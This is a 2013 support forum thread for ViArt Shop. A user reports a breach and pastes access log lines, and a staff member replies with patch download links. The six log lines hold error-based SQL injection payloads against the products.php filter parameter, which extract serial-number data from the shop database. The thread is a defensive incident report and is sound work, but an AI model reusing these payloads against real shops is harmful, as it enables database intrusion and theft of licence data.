Menu
Our site www.viart.com is operated by latest Viart Shop 5.8.28 with default Clear design
Topic Information
success7777777 (Guest)
success7777777 (Guest)
18 Jun 2013 10:56 PM
ViArt Shop hacked with similar SQL queries. How to deal with it?
 
113.22.110.170 - - [15/Jun/2013:07:19:17 +0300] "GET /products.php?category_id=0&filter=%26fl1%3D13%20and%28select%201%20from%28select%20count%28*%29%2Cconcat%28%28select%20%28selec t%20%28select%20concat%280x27%2C0x7e%2Cva_items_serials.item_id%2C0x27%2C0x7e%29%20from%20%60viarts%60.va_items_ serials%20Order%20by%20serial_number%20limit%2040%2C1%29%20%29%20from%20%60information_schema%60.tables%20limit%200%2C1%29%2Cflo or%28rand%280%29*2%29%29x%20from%20%60information_schema%60.tables%20group%20by%20x%29a%29%20and%201%3D1 HTTP/1.0" 200 9018 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
113.22.110.170 - - [15/Jun/2013:07:19:20 +0300] "GET /products.php?category_id=0&filter=%26fl1%3D13%20and%28select%201%20from%28select%20count%28*%29%2Cconcat%28%28select%20%28selec t%20%28select%20concat%280x27%2C0x7e%2Cva_items_serials.used%2C0x27%2C0x7e%29%20from%20%60viarts%60.va_items_ serials%20Order%20by%20serial_number%20limit%2040%2C1%29%20%29%20from%20%60information_schema%60.tables%20limit%200%2C1%29%2Cflo or%28rand%280%29*2%29%29x%20from%20%60information_schema%60.tables%20group%20by%20x%29a%29%20and%201%3D1 HTTP/1.0" 200 9009 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
113.22.110.170 - - [15/Jun/2013:07:19:21 +0300] "GET /products.php?category_id=0&filter=%26fl1%3D13%20and%28select%201%20from%28select%20count%28*%29%2Cconcat%28%28select%20%28selec t%20%28select%20concat%280x27%2C0x7e%2Cva_items_serials.serial_number%2C0x27%2C0x7e%29%20from%20%60viarts%60.va_items_ serials%20Order%20by%20serial_number%20limit%2041%2C1%29%20%29%20from%20%60information_schema%60.tables%20limit%200%2C1%29%2Cflo or%28rand%280%29*2%29%29x%20from%20%60information_schema%60.tables%20group%20by%20x%29a%29%20and%201%3D1 HTTP/1.0" 200 9051 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
113.22.110.170 - - [15/Jun/2013:07:19:22 +0300] "GET /products.php?category_id=0&filter=%26fl1%3D13%20and%28select%201%20from%28select%20count%28*%29%2Cconcat%28%28select%20%28selec t%20%28select%20concat%280x27%2C0x7e%2Cva_items_serials.serial_id%2C0x27%2C0x7e%29%20from%20%60viarts%60.va_items_ serials%20Order%20by%20serial_number%20limit%2041%2C1%29%20%29%20from%20%60information_schema%60.tables%20limit%200%2C1%29%2Cflo or%28rand%280%29*2%29%29x%20from%20%60information_schema%60.tables%20group%20by%20x%29a%29%20and%201%3D1 HTTP/1.0" 200 9027 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
113.22.110.170 - - [15/Jun/2013:07:19:23 +0300] "GET /products.php?category_id=0&filter=%26fl1%3D13%20and%28select%201%20from%28select%20count%28*%29%2Cconcat%28%28select%20%28selec t%20%28select%20concat%280x27%2C0x7e%2Cva_items_serials.item_id%2C0x27%2C0x7e%29%20from%20%60viarts%60.va_items_ serials%20Order%20by%20serial_number%20limit%2041%2C1%29%20%29%20from%20%60information_schema%60.tables%20limit%200%2C1%29%2Cflo or%28rand%280%29*2%29%29x%20from%20%60information_schema%60.tables%20group%20by%20x%29a%29%20and%201%3D1 HTTP/1.0" 200 9018 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
113.22.110.170 - - [15/Jun/2013:07:19:24 +0300] "GET /products.php?category_id=0&filter=%26fl1%3D13%20and%28select%201%20from%28select%20count%28*%29%2Cconcat%28%28select%20%28selec t%20%28select%20concat%280x27%2C0x7e%2Cva_items_serials.used%2C0x27%2C0x7e%29%20from%20%60viarts%60.va_items_ serials%20Order%20by%20serial_number%20limit%2041%2C1%29%20%29%20from%20%60information_schema%60.tables%20limit%200%2C1%29%2Cflo or%28rand%280%29*2%29%29x%20from%20%60information_schema%60.tables%20group%20by%20x%29a%29%20and%201%3D1 HTTP/1.0" 200 9009 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
 
Vito
Vito
19 Jun 2013 1:39 AM
Hello,
 
To fix DB errors which could give such requests you need to install the following patches
 
http://www.viart.com/downloads/filter_functions-3.6.zip - unzip and copy to includes subfolder
http://www.viart.com/downloads/block_filter-3.6.zip - unzip and copy to blocks subfolder
 
Thanks,
Vito
 
success7777777 (Guest)
success7777777 (Guest)
19 Jun 2013 9:14 AM
Thank you Vito!